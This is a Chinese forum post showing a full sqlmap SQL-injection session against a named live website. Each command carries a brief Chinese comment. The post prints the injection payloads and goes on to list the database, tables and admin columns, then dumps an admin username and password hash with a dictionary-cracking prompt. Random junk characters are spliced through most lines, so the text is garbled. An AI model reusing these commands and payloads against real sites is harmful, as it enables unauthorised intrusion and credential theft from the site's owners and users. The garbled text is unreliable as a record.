D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% H3 l5 _ v$ n9 jms "Mysql" --current-user /* 注解:获取当前用户名称
) S( i$ @2 T' J) b+ R& b n2 o sqlmap/0.9 - automatic SQL injection and database takeover tool
; x& G$ O5 i4 k. l' S# l5 r& d http://sqlmap.sourceforge.net starting at: 16:53:541 {& B" q, b# }+ F
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( Z5 @7 g/ }/ e" H$ F
session file" J3 [' R$ R" q# o
[16:53:54] [INFO] resuming injection data from session file% M) e4 e; Y- h8 U$ T7 G7 D
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
, z0 k& X0 q/ U6 D- k[16:53:54] [INFO] testing connection to the target url
5 M. E4 G$ m( tsqlmap identified the following injection points with a total of 0 HTTP(s) reque! f8 f2 L) ~* f+ o2 D5 H0 Y8 i; L
sts:, E3 O0 n0 o( J" n/ |
---
1 `+ g% i+ R6 d4 [4 y) k1 ZPlace: GET
4 |# L0 i3 j: Y4 B7 M% x( ~Parameter: id
2 g3 ~) g9 h1 \ Type: boolean-based blind8 y1 b2 o Z \' M5 \
Title: AND boolean-based blind - WHERE or HAVING clause- Y( @: F) c$ l1 G
Payload: id=276 AND 799=799
3 N9 Q4 { A ]7 g+ g/ d Type: error-based C) N" c N; y' j
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# {1 R1 K8 @- z" R+ E
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' ^% O/ ?' I- k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 s$ x4 `; y) ~, S$ V; D),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! ^' f& I: g, X/ a
Type: UNION query
) S: C: }; V+ P/ B4 L5 y Title: MySQL UNION query (NULL) - 1 to 10 columns9 D5 o; S4 r4 G8 }
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* H* v9 z: K8 Q, }! F
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 e% s& Y$ @ k( O7 O: P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
1 s) @+ _) @1 E Type: AND/OR time-based blind
) ^2 m/ i' {( l. t$ Z1 h Title: MySQL > 5.0.11 AND time-based blind
3 g+ |) E( B! A( C' O$ f) q Payload: id=276 AND SLEEP(5)
P' W- ?" o9 w: G, r- _; b---. A8 h2 m2 m3 E. f* I( {; p0 U
[16:53:55] [INFO] the back-end DBMS is MySQL+ J! z4 X7 Z- @& f$ y
web server operating system: Windows3 a8 `4 w. C0 y) A/ l! Q
web application technology: Apache 2.2.11, PHP 5.3.0
0 q+ _: g% ?% S, dback-end DBMS: MySQL 5.0! j7 L8 Y0 z. E/ m
[16:53:55] [INFO] fetching current user
4 B3 S$ q% n0 u" H$ L9 e% C% e" tcurrent user: 'root@localhost' & N4 o8 }$ N4 S/ K: k
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 B6 E- V- R% [
tput\www.wepost.com.hk' shutting down at: 16:53:58
0 R9 k4 Y0 T3 F- V1 T6 E( o0 R) s4 u2 ~: l
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ A1 ]4 u% ~4 V
ms "Mysql" --current-db /*当前数据库9 Z3 l/ d8 A1 A+ q3 o$ T
sqlmap/0.9 - automatic SQL injection and database takeover tool/ E5 ]1 J1 H" X& W( f2 v: W: D
http://sqlmap.sourceforge.net starting at: 16:54:163 {8 G; O u# v# w# L" X. i L
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as- o# p, O. }/ Z
session file
1 }+ }2 Q1 J# m( p1 Z+ ~9 B: S[16:54:16] [INFO] resuming injection data from session file
+ N& R( J3 U) I9 n( p1 ~6 |[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
v( k8 v7 }" y" _. |. _[16:54:16] [INFO] testing connection to the target url
0 X f Y/ K, x0 _0 jsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ J+ o, _8 d) H* F4 N
sts:
. [" a ^+ k; p" F4 s* W3 b1 e---
( ], \7 p; _5 a0 M: Y0 JPlace: GET
5 S3 z+ a# n+ l; ` \2 qParameter: id; r! k; O t( C0 V( q, M
Type: boolean-based blind
; q f9 ?8 P! D/ X Title: AND boolean-based blind - WHERE or HAVING clause
% J- _" \7 k- F( l6 ^( f, P Payload: id=276 AND 799=799
- i7 w! r7 i0 y2 g$ i Type: error-based
' e3 w& B, @; O Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! X* r, H; T! H. Y6 B
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& P, e* S8 ^; `5 T& |' q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; r x+ v% v2 e0 S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ c8 S& H# P. R( Y- {
Type: UNION query
( R2 s. X m6 t Title: MySQL UNION query (NULL) - 1 to 10 columns
^" }( x: k$ i( Z( a. { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 J& ^( y6 @% u1 k5 c/ f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ \3 V0 V: [1 @% h) Y8 y
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) w4 ^: B. x( X8 d Type: AND/OR time-based blind
4 S0 k9 o. K4 H4 ^6 D' H Title: MySQL > 5.0.11 AND time-based blind! M6 [& n+ S$ H0 g
Payload: id=276 AND SLEEP(5), N& A+ H* ^0 c) o8 J: k) }
---5 r+ `, z+ h3 E% h1 T
[16:54:17] [INFO] the back-end DBMS is MySQL
. {. @( k6 ~ n5 _4 Nweb server operating system: Windows
' D6 _5 g6 X M) u4 E/ w8 o8 C7 xweb application technology: Apache 2.2.11, PHP 5.3.0
$ h3 ^: ?3 U! Z7 g+ x) _! nback-end DBMS: MySQL 5.0
r! V8 ]6 M& V/ \' S: m[16:54:17] [INFO] fetching current database
: @1 x0 K5 N* {current database: 'wepost'
) l2 ~" E0 i" [7 C[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, c! I5 T' `! N& p5 Stput\www.wepost.com.hk' shutting down at: 16:54:18
& V* L. T1 o) m' u% o7 X. _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 d7 t1 M3 V' E) {2 M- M
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名' u. l+ u6 R$ A1 q
sqlmap/0.9 - automatic SQL injection and database takeover tool
7 h; v1 G: F1 u$ ^: J4 v# x8 G http://sqlmap.sourceforge.net starting at: 16:55:25
9 V7 X) V. e0 j9 a1 u; @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
& l$ i C0 I! z) j session file
6 O) C! i9 m4 W z[16:55:25] [INFO] resuming injection data from session file
4 U" f6 p& o/ ~4 r) N8 U- ?3 n[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
7 J. o- F/ o0 q. s# U[16:55:25] [INFO] testing connection to the target url+ j7 y2 n) b: S" O; A; m5 w
sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 @, Z2 d0 t. G( B* r `
sts:
2 T2 F: G0 R% G- D0 V---- U! m F4 V/ i7 k
Place: GET5 Y( }. r4 n, C9 U8 k0 s
Parameter: id8 h* L6 _1 i2 {' t# t4 g
Type: boolean-based blind
" F, @. H& Q/ |* X6 p3 i) a Title: AND boolean-based blind - WHERE or HAVING clause1 q7 |% B+ w; }: u' {+ {3 u
Payload: id=276 AND 799=799% b" X, [9 G% u3 F# V/ f
Type: error-based
: Q; @( P! t! E. G+ f3 }; c8 Y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, [1 S4 q6 l* f. D. v' }7 h1 g Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
% V. n T; V. a120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% U0 {9 n$ C( @) S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: o q. Z8 w- \: P$ K! g Type: UNION query- m. `8 O" C- k
Title: MySQL UNION query (NULL) - 1 to 10 columns5 m0 ]2 z ~/ `! k# M& m
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 B8 a* j# J' |0 k c* k(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
& B; F) X* _% iCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; x4 P- [9 o' R# Z* V5 l5 ^5 e' g9 ~4 ] Type: AND/OR time-based blind
/ ]; E$ b: z: u, \( m; {9 U; u3 S Title: MySQL > 5.0.11 AND time-based blind
. j8 O# x. M# R$ Y' g+ F% E7 p2 b& ] Payload: id=276 AND SLEEP(5)
7 f+ x1 L2 V; h4 k, y- _' `& y---) q* u% C1 k" p; j. v. W) k
[16:55:26] [INFO] the back-end DBMS is MySQL
( H7 n8 i* @3 }, T X# tweb server operating system: Windows
$ ~0 x$ ^" z; G2 |web application technology: Apache 2.2.11, PHP 5.3.0- B- y( b l, s; p- H% W
back-end DBMS: MySQL 5.00 H3 e; c5 l& `, G7 o
[16:55:26] [INFO] fetching tables for database 'wepost'9 J' G$ m, b* b5 ~2 E
[16:55:27] [INFO] the SQL query used returns 6 entries5 t1 [( I% d/ Z2 h' I
Database: wepost9 i! Z1 f4 l8 [
[6 tables]
" ^0 u: ~" `9 W" s- Q5 \+-------------+
g( L! a5 m5 i3 H| admin |/ {( w# H0 B6 G$ b; `: ?) l( ~
| article |3 Y& F4 t i: A
| contributor |
( {- a9 C, Y, G' u# [& n( p: ]" N| idea |+ c1 r9 |4 \9 m- D
| image |- A9 X6 W7 w$ d& d- ]8 u
| issue |
. [/ O/ m2 F+ K) e, O+-------------+" Y; ~6 Y' f, G" L7 y1 ?* \
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ R. K9 }# d' O2 C" M- F2 ]
tput\www.wepost.com.hk' shutting down at: 16:55:330 E. D5 x. J0 i C; W: S4 R) Q1 n! d
! A# G4 f+ \8 [% C6 E' QD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" ]( r! V) ?. q; q$ p
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
0 l3 Y# \# }1 j! _) d sqlmap/0.9 - automatic SQL injection and database takeover tool
; C7 h4 R# K/ U6 D7 Z http://sqlmap.sourceforge.net starting at: 16:56:06
5 n+ m! E$ O* U/ Isqlmap identified the following injection points with a total of 0 HTTP(s) reque
# G2 o, G8 ~' psts:9 g% V" N4 |: X' I8 ?! `# `
---
1 A+ e' B Z. ]- j% |6 r: W& I. {Place: GET7 ` n: i) ]* _* V. w8 m S1 |
Parameter: id: z2 O3 T; d* H Q' ?6 D
Type: boolean-based blind
j& Q$ y+ {* ^" Y7 i Title: AND boolean-based blind - WHERE or HAVING clause" x2 a8 U% ^" A% Z2 Q& w
Payload: id=276 AND 799=7993 z2 G; J4 c! M) P" O# R
Type: error-based0 K5 v' Y% ^. M( P
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 M$ }* O. t% S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 K2 J' [3 W U9 g. K' H" `+ e+ j0 W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! k" _) S. o. n: y0 _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: F, x, W1 Y, ~) J Type: UNION query
/ n" i# J, X% _( b$ ^- m k# L Title: MySQL UNION query (NULL) - 1 to 10 columns+ X4 Z5 V' B# [% `
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' c: _: P) o( V0 ~* L) U
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
2 ] ^2 F; v0 l& K; v$ S. a0 G! \2 }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 \' y) S; E5 b
Type: AND/OR time-based blind2 d/ t1 y/ x- f
Title: MySQL > 5.0.11 AND time-based blind7 w1 c% r: l- N1 K% h! L
Payload: id=276 AND SLEEP(5)* B/ |+ C' n2 u& \$ r1 M5 J( Y0 I
---
' U5 Z, `' j1 L( @web server operating system: Windows
5 s/ U4 p' [4 J* ~7 p7 u, ^web application technology: Apache 2.2.11, PHP 5.3.0
2 F K6 @1 m2 Zback-end DBMS: MySQL 5.0# b* G- w) K4 N! D! R6 M
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
& J( W# B$ R/ V# s jssion': wepost, wepost6 u+ f7 o- a2 s5 ^- _6 B5 h
Database: wepost2 o$ _8 G |; t! M) T, w: H! b
Table: admin8 h6 u! Q& A6 |$ y) b% l
[4 columns]
2 }0 ~% B8 i T3 S$ X8 T+----------+-------------+' q- U+ ^4 o `: {0 M8 }
| Column | Type |+ H4 m! e& C% b5 g7 f% N& a
+----------+-------------+
+ L: t: f1 T% V C" z| id | int(11) |
! r3 m' w# F2 \% \| password | varchar(32) |
# H0 h* `1 ^" K6 H' E| type | varchar(10) |
( X# w7 B' V9 N6 }| userid | varchar(20) |
4 A6 f& P& \7 \$ T# G+----------+-------------+
5 Z8 t% v# ]5 M8 G: | shutting down at: 16:56:19% [' h/ T& o9 t
9 L; C P0 ~" c) Y+ W5 L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 R; n& x+ B7 }9 X" ~
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
; A; ?# \2 g! A/ z. y2 s( J sqlmap/0.9 - automatic SQL injection and database takeover tool
% y3 ^ {# g8 t! {5 N5 T! x http://sqlmap.sourceforge.net starting at: 16:57:14
5 g0 q [0 T8 _* |; q* E8 Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque! H: C+ y7 r$ h4 t; I; H* _+ k9 l
sts:
/ ?4 {6 M9 Q% D8 g; I+ j---
W2 i) r0 O1 t5 PPlace: GET
- d; I4 V% S Q2 kParameter: id
# c. O6 [& r/ P- k4 x( U3 I$ T, j Type: boolean-based blind" m5 |7 m- F4 F# s# N& v
Title: AND boolean-based blind - WHERE or HAVING clause' J c/ w/ e6 @5 Y, g
Payload: id=276 AND 799=799# E9 b5 ?3 V4 b) k
Type: error-based
6 ]9 y, }$ [0 Z" ?* R, Z! y8 f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 E+ R. j2 {% O Y9 n
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 @" I% A/ O- M n( y/ A
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: |/ T4 q# i7 n( W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% M* T" g2 h+ T+ L/ ~! ~
Type: UNION query
% M. M) c4 ~8 t- e. J n Title: MySQL UNION query (NULL) - 1 to 10 columns
) m6 W7 B( T9 V$ Y: z2 l! ^9 ?3 W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 d# o' L9 B& K0 d0 r2 E0 Z! G- t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
8 m: z0 m- r; H& S7 DCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; r N: l& v/ z6 h Type: AND/OR time-based blind: \5 v: l( d, D- F0 G9 o9 ?
Title: MySQL > 5.0.11 AND time-based blind# Y2 k- A4 d1 h
Payload: id=276 AND SLEEP(5)1 }* W& S, u' |5 N# N
---3 |4 ] j. t# m6 ]
web server operating system: Windows
# a% G$ T- D! {# mweb application technology: Apache 2.2.11, PHP 5.3.0) j% B9 T1 W d0 P- I! R! E& I8 f' y
back-end DBMS: MySQL 5.0/ m6 W7 I" F8 z1 F0 k
recognized possible password hash values. do you want to use dictionary attack o- u0 |6 v1 E, Q" ?
n retrieved table items? [Y/n/q] y: l+ o" f* T" J8 X
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
q+ J4 O9 b# `, U9 E2 c0 jdo you want to use common password suffixes? (slow!) [y/N] y
# o( m( D; G' y7 dDatabase: wepost4 g2 Q5 D4 n! r7 u$ n& s' {: R/ z
Table: admin. W: ~ E! T/ ?) F3 _3 s4 F
[1 entry]) W" Z) M7 L+ ]3 ?. y
+----------------------------------+------------+
2 ]8 W' L7 E L w) S+ ~| password | userid |1 X% ^5 q# @& e! p$ w& {) C( q
+----------------------------------+------------+0 \% w6 f4 o; g |- V& s" `/ ]
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |, b; K3 A9 V) S# d4 g9 q
+----------------------------------+------------+1 |, _. p$ {$ e. ]4 c
shutting down at: 16:58:14
: v7 i- S. o p% H% j8 _* Y- U: D
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对